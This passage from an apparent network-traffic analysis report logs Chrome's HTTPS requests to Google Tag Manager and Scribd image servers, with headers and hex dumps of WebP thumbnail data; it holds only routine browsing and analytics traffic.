                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.googletagmanager.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC443INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Server: cafe
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        103192.168.2.1649838172.217.17.784436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC872OUTGET /ccm/form-data/991817613?gtm=45be4c40p3v9178425511z878386455za201zb78386455&gcs=G1--&gcd=13l3l3l3l5l1&dma=0&tcfd=10000&tag_exp=101925629~102067555~102067808~102081485&npa=0&frm=0&pscdl=noapi&auid=1182281480.1733522361&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&ec_mode=a&em=tv.1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: google.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.googletagmanager.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC782INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsgac:57:0
                                                                                                                                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                                                                                                                                                                                                                        Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsgac:57:0"}],}
                                                                                                                                                                                                                                                                                                                                                                                        Server: Golfe2
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        104192.168.2.1649844151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC645OUTGET /img/word_document/308030757/149x198/2af38cbda9/1731726615?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-1-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 6538
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "uZgQk1kxEqT6djQfNwOW3UvJJ1l4F/XLSUTLbgWnne4"
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Info: ifsz=13524 idim=149x198 ifmt=png ofsz=6538 odim=149x198 ofmt=webp
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Served-By: img02-us-east4
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Stats: io=1
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 107
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Age: 138721
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-kigq8000020-CHI, cache-ewr-kewr1740074-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0, 8
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522379.962642,VS0,VE0
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 52 49 46 46 82 19 00 00 57 45 42 50 56 50 38 20 76 19 00 00 50 6e 00 9d 01 2a 95 00 c6 00 3e 65 2a 91 45 a4 22 a1 98 3a 67 dc 40 06 44 b1 80 6b 8a 2d 95 3f dd 7f 0a 72 90 14 7e cd 39 55 f7 b3 ea 6f f3 7f fb 4f 50 df ee 7d 45 fc c7 fe c5 7e b0 7b be ff 94 fd 60 f7 57 e8 01 fa d3 d6 c5 e8 3b e5 93 fb 33 f0 ad fb 6f e9 51 9a e7 fd 77 f1 bb dd 77 88 1f 85 fc ad f4 5f f1 ef a6 ff 0f fd c3 f6 f3 fb d7 b9 b6 7b fb 0c d5 1f b2 bf ca 79 51 ff 1f fc 17 8e ff 0a 3f a1 fe f1 f9 19 f2 05 f9 3f f3 7f f3 fd f6 bd cd 5b 3f fb 3f 40 8f 66 fe db e7 81 f0 bf f1 fd 12 fb 2d ff 53 dc 03 f9 6f f6 0f fa 9e bd ff ce f0 ae fc 27 fd cf 60 2f e6 bf e3 7f ea 7d cb 7d 37 7f 7b ff b7 fc e7 fa 8f 51 9f 58 ff f2 ff 47 f0 21 fa f3 ff 63 fc 37 b6 e7 b0 1f de 8f 65 af da a5 b7 be 27 7f 48
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RIFFWEBPVP8 vPn*>e*E":g@Dk-?r~9UoOP}E~{`W;3oQww_{yQ??[??@f-So'`/}}7{QXG!c7e'H
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 32 d6 af 1a 53 e2 4f a1 75 75 fa 64 ab 2d 23 a1 e2 ab 16 56 f3 e4 72 18 8f 5c 6e bd 16 5c f9 34 f3 2a 39 e0 71 c2 9f b5 6e 03 81 8f 74 c8 69 4f 81 51 66 a3 fd b3 b8 48 4c 57 2a ad 41 69 1d 78 69 3f 05 e0 c1 1c 21 b5 49 76 41 15 78 b7 4b 02 d4 31 e4 53 86 28 3f 6b 20 db 1f 5f b4 8f af d3 f5 30 95 54 39 3e 36 34 89 45 22 4e 28 0f 31 9a b4 9a 5b e2 8d f7 40 d0 70 94 b1 3c 2d f9 a9 b8 c4 8e de 45 5c 90 f7 5c e9 69 58 06 a4 05 c5 f3 12 82 99 b5 ca e9 51 73 c1 48 07 f4 4b 1a 50 50 f4 7c b3 27 7b 74 52 d8 10 92 f6 e0 7b c0 f0 95 6a 72 0d 13 49 73 23 de 47 64 ec 0d 59 0e 21 17 1f 24 b3 fc b2 4e 27 4d 99 e5 c4 19 e3 18 a1 44 1f 5a 00 6a c0 62 3c 62 41 70 d3 db dd 4a 09 8a be 94 6d 1b 4c 2a 52 93 53 d3 11 22 29 c5 7e b3 ff a1 d8 63 65 6b cb 11 c5 f6 ba f2 9d d3 45
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 2SOuud-#Vr\n\4*9qntiOQfHLW*Aixi?!IvAxK1S(?k _0T9>64E"N(1[@p<-E\\iXQsHKPP|'{tR{jrIs#GdY!$N'MDZjb<bApJmL*RS")~cekE
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: cd 90 c7 b7 45 5b ac 10 90 86 23 bb 1c b7 c2 df 1f 59 29 09 7b 38 15 ad 91 b9 41 ed 79 ed 16 d4 5e b5 0f 4f c1 23 bc 75 3b a1 0e f9 e3 f0 47 93 46 cf 03 26 40 61 49 bd 0a ab 19 2c 7a bd 44 a1 6a 63 c1 1a 2c d4 91 9a e1 5f c9 fc 6d 50 e9 c2 46 32 e5 f0 d5 83 8a b1 dc ae 8f 1e 19 74 89 ee e1 8f 61 20 33 3f 27 bd 33 33 a5 fe 68 68 b7 d7 bb 5e 4b 16 6b 7d 7a 10 32 a0 60 d5 9b 4d ae 24 59 80 45 4e 30 3b fa 48 b5 95 3a 76 47 56 05 73 50 b9 09 4f fb 37 a9 61 f0 c3 ba 38 c9 d9 ff ae 71 7c 74 a2 9f a2 7d e1 88 17 d4 fa a6 1b 04 2e f8 61 c5 4b a8 8a a2 56 b0 02 58 a9 39 41 3c 59 ae 4c 8f 5b a4 4c 6f 06 f9 23 8d 20 e7 17 8f 76 ea cd aa f0 ca c2 14 cd 4e 66 49 36 97 20 cf 1b 56 fd 5d fe a3 39 de 89 98 e8 11 2b 66 6e 69 d7 21 ea b3 de ef 91 65 d2 b9 78 7d 1e a4 59 47
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: E[#Y){8Ay^O#u;GF&@aI,zDjc,_mPF2ta 3?'33hh^Kk}z2`M$YEN0;H:vGVsPO7a8q|t}.aKVX9A<YL[Lo# vNfI6 V]9+fni!ex}YG
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 30 4f 03 d0 cc 28 7b c3 7a 73 18 e8 a2 64 c0 81 fd 9a 17 5f ea 2f a3 12 98 ce 94 fd c9 01 23 c8 7e 73 44 cf 5b 21 13 bb cd be ab a7 e4 74 16 72 f5 8e de e5 ac 15 bf e8 57 aa 65 f5 9e 48 a1 a4 a3 8d 21 e4 53 c8 52 17 6f a2 2d a7 2a c5 2e 5b 01 b1 61 7b ad 8d f7 59 20 21 98 7e dc 01 79 09 5b 01 2e e8 cc c5 72 ac ec 0b 26 c7 32 1d e9 d8 c5 3f e5 52 4e cb 7b f8 c4 ea 55 b5 e8 7a 8c 5d ad 01 4f e8 0d 78 ef 41 8a d0 8f 38 7e 5e 82 0a b5 f5 a4 e4 4a 61 f4 db 65 a9 77 5e 8b da d2 68 3f b4 48 50 5d d3 f7 8f 66 d5 7a 92 62 81 c0 34 84 d3 72 39 d6 df c3 ab ba 86 46 b6 3f 7d 32 09 91 e2 4f 10 54 21 b8 28 67 10 47 db cc 9a b5 a2 1c af 93 cc 6e 92 5b 54 67 2e 4c 75 77 b3 73 07 69 4b 3e 70 07 6e 05 e1 39 b2 3e 21 42 67 ca 01 49 96 4a aa e7 b8 fa cb a9 49 c6 af 44 3d 55
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0O({zsd_/#~sD[!trWeH!SRo-*.[a{Y !~y[.r&2?RN{Uz]OxA8~^Jaew^h?HP]fzb4r9F?}2OT!(gGn[Tg.LuwsiK>pn9>!BgIJID=U
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1026INData Raw: 99 9d 41 70 7a 94 12 39 7d 05 44 5e a3 26 9b 76 87 6a 8a b6 59 69 58 0e 1e 83 23 4f e9 24 2e 67 3a b4 5a 01 67 3c b3 0a 04 06 7f 0c b8 f6 cb 92 83 f5 ad 28 e2 f2 be 70 72 37 fd 4f b2 81 7c e2 76 5c 1a e7 06 c8 e5 83 b9 c0 88 f8 40 e5 81 91 4d 56 a0 a4 36 64 e2 a0 96 3c 85 04 03 50 a9 85 13 63 4e 9e ea 2f ac 47 dd 9e 7a 56 e7 b7 2b d0 68 b0 fd bc 1d cf 6a d2 99 02 2b 42 a5 9f 4a 87 20 c1 9a 71 3e f3 15 24 ed 17 49 9b cc 60 39 79 66 fa c2 f1 97 a6 89 e1 6f 85 e5 ba e6 ca ba c2 73 4b 3f f6 9c f9 bd a6 22 c9 2a b2 40 03 16 5e b8 a5 18 cc 24 7e b6 c7 8c 6e 3b 92 c0 2f f7 5d 05 13 dd ff d1 24 63 31 3a 33 66 72 0f 06 06 ee f9 6f d6 de 3d 58 0f 02 0b 0d 90 79 99 0c e7 bb 68 c1 0e d5 92 0f 33 75 a1 9c 95 d9 e4 d7 57 bc 53 4c af 0e e5 3d 70 2e 83 7a 1b c6 83 0f ac
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Apz9}D^&vjYiX#O$.g:Zg<(pr7O|v\@MV6d<PcN/GzV+hj+BJ q>$I`9yfosK?"*@^$~n;/]$c1:3fro=Xyh3uWSL=p.z


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        105192.168.2.1649845151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC645OUTGET /img/word_document/309859835/149x198/394d1573f0/1716986829?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-1-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC780INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 4650
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "KRoV5xa+kaTJJOUuGGQFChI8XcK2sSrTU3B+L+mH9nM"
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Info: ifsz=13227 idim=149x198 ifmt=png ofsz=4650 odim=149x198 ofmt=webp
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Served-By: vpop-kiad7010230
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Stats: io=1
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 259
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Age: 353975
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-kigq8000050-CHI, cache-ewr-kewr1740051-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 7877, 1
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522379.257918,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 52 49 46 46 22 12 00 00 57 45 42 50 56 50 38 20 16 12 00 00 10 4d 00 9d 01 2a 95 00 c6 00 3e 6d 32 95 46 a4 23 22 21 28 75 3b a8 80 0d 89 64 0e ba 6c b9 7c 40 42 c4 f0 ff 80 ed 56 d7 3e 73 fa 77 a2 a5 7f fc 0f f6 1f 33 7d 34 74 27 93 97 41 79 e6 fe fb fa e7 ee 17 f3 df b0 37 f7 4f 2c 0f 52 fe 61 3f a4 ff ad fd 9f f7 41 ff 71 fb a3 ef 7f fb 27 a8 7f f7 1f f5 fd 6c be 8b fe 5d fe d0 bf ba 3f b8 fe d4 59 ad 3f a7 bd d6 ff a1 e6 15 97 cf 83 d9 a8 fb c7 fb 6f 3a 7f 57 bc 5f f9 11 fd d7 a8 47 ac 3f d4 6f 7c 80 2f cf bf ac 7f d1 f0 dc d4 9b 20 0e f8 cf 0f bf 33 f6 0a fe 4f fd bf ff 07 aa bf fd 9e 6c 3e b1 f6 0e fd 6b ff b5 eb a1 ec 13 f7 5b d9 cf f5 d0 d2 58 72 23 70 e4 14 58 b5 14 c4 31 dd a6 95 e3 b8 c6 58 cf dc 15 fb 4c 60 8b 04 69 77 2f b1 48 5c ab dd 2f 77
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RIFF"WEBPVP8 M*>m2F#"!(u;dl|@BV>sw3}4t'Ay7O,Ra?Aq'l]?Y?o:W_G?o|/ 3Ol>k[Xr#pX1XL`iw/H\/w
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 6b 57 35 b8 4c 13 de f2 fd 57 14 03 4e c7 71 59 3a 80 f8 43 7d b6 35 cf 0d 01 4f f9 9b 8a 87 7f 93 4b c2 28 3b ac 5a 0a c2 09 63 c3 54 61 fc 5b 11 60 5e a7 80 47 fd 0a 06 d4 78 b9 71 21 6c 1c 44 9d f0 25 34 5e 3c 90 d9 59 e3 da 39 6b 98 b4 20 59 1d 2d 32 43 ee 1c 2b cd 1c 3f 5c 15 ee 5c cf 33 f6 36 12 1b cf 36 c8 cc a0 ee 60 6b c2 04 75 34 e8 5a 8d 9b 64 ef 65 b7 84 79 b1 6b e3 f9 35 10 73 59 02 aa ca 0c 9f ab 2f f6 02 54 6a 21 81 c7 9c 25 38 36 77 f9 10 65 61 22 0a af 76 eb 62 1d 94 72 65 13 4b 24 be e5 72 87 25 d0 d2 6e f2 b9 3b 14 b8 98 bc cc 60 c8 c5 f8 eb 61 68 ac f6 6a 4a 02 fb f8 fb 09 a7 a4 1d 36 15 a6 fc 52 69 25 5d 94 58 57 4e c2 1f 04 6a 83 95 33 54 74 1b 40 ce 68 3b cb 83 80 bb b1 a4 3d 07 35 47 7e 14 d4 61 4c d2 6e 1d 34 0f da 4c a8 11 ef 80
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: kW5LWNqY:C}5OK(;ZcTa[`^Gxq!lD%4^<Y9k Y-2C+?\\366`ku4Zdeyk5sY/Tj!%86wea"vbreK$r%n;`ahjJ6Ri%]XWNj3Tt@h;=5G~aLn4L
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 74 c9 af 75 97 24 f7 81 9d 97 7a 82 a6 58 27 b7 cd 15 85 1f e4 fc 68 7a 60 a5 f7 1a c1 da f0 19 d0 6f 17 fe 99 bb b2 4d 21 a5 19 ec 02 5b 67 d9 e7 a5 87 27 de f9 be 29 ff 83 f7 69 35 2d 79 12 fd f9 ca d5 f8 6a ea c1 00 b6 4a 8d f7 8f a7 e7 ad e6 d0 1d 6e 3e 28 ac 11 e6 2b 3a 81 e1 8c d9 cb 15 9b 05 48 bb d2 e5 88 b8 1b f3 54 1b f5 88 1c ff 55 8a 7b b4 76 f8 db 1e f0 6b 72 f4 05 47 c5 af 6f 72 a1 18 69 6b 9a 72 95 09 c3 8a 22 eb 37 f5 ce 2b 40 32 9a 91 38 e8 80 78 34 84 b4 bc 0c 08 77 43 1d cc 78 2e 35 12 fe 9f 3e 8a 1d aa 59 ee cd c5 6a 68 26 7a 7e 36 0f ad 3e 11 7f ed 7f f0 a9 69 e7 41 f7 3e 1b b0 79 ac 7d 87 65 67 fd bb 03 59 a3 c3 c0 fd bd 79 fb 08 92 fb 8c 21 cf 3f a9 e7 9a 70 22 aa e0 e5 d2 b8 c3 ea 1f 8a 89 01 34 da 57 ec 75 78 28 78 46 a2 e3 39 f8
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: tu$zX'hz`oM![g')i5-yjJn>(+:HTU{vkrGorikr"7+@28x4wCx.5>Yjh&z~6>iA>y}egYy!?p"4Wux(xF9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC516INData Raw: fa a5 1d 8d 31 7e 8a e4 27 f9 7e 9c d0 37 ee 89 24 c5 2d af cc a1 b8 d0 5f 1f 5f 26 58 78 8e 88 75 ff 0f a2 26 1d ea 84 9d a0 9f 6a f7 5f f4 06 bd 4d a7 ae 9d 06 e3 d3 52 c7 c2 11 01 fe 35 c0 45 1f 6c 94 59 50 7c b3 a7 00 2b d3 cc d4 a8 c1 16 f4 86 2d 6d 82 8c 0f fc 5d e5 ab 67 a8 b3 bc 8d 9a 2f 52 63 cd 21 29 54 98 44 a8 2f 6c f4 7c 13 1f dc 34 38 ee 13 bd 1e 5a c1 ff 66 d9 bf 37 a2 b3 45 ba 6e 83 a7 9a 07 83 3f 7e 54 e6 d6 29 fa de 4b 22 42 2d 06 67 d0 c0 f9 13 2d d2 c3 52 c5 74 5b 28 3d 17 99 f9 47 8f 29 77 87 41 02 6c f1 59 2f ec ec 20 81 dd 84 a4 bf 5c 65 04 0d 09 0a 2b b3 2c 96 88 fe 44 56 9c c7 74 64 13 37 2a bb ee ab 28 ec a4 e3 dd 44 18 da f1 c3 bd 44 a7 6e 7e 04 8c 18 24 a0 fc 1b 0e 2e 79 6a 50 2e d2 27 a8 65 0b cb ab 4c 5f f0 f1 29 90 27 d6 57
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1~'~7$-__&Xxu&j_MR5ElYP|+-m]g/Rc!)TD/l|48Zf7En?~T)K"B-g-Rt[(=G)wAlY/ \e+,DVtd7*(DDn~$.yjP.'eL_)'W


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        106192.168.2.1649847151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC645OUTGET /img/word_document/224266633/149x198/196f9b9902/1731728881?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-2-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 4662
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "i6tKLBzs4/KI+zoLZaYK6+2dzEUvI79iT5oOns+FAYw"
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Info: ifsz=11734 idim=149x198 ifmt=png ofsz=4662 odim=149x198 ofmt=webp
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Served-By: vpop-kiad7010211
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Stats: io=1
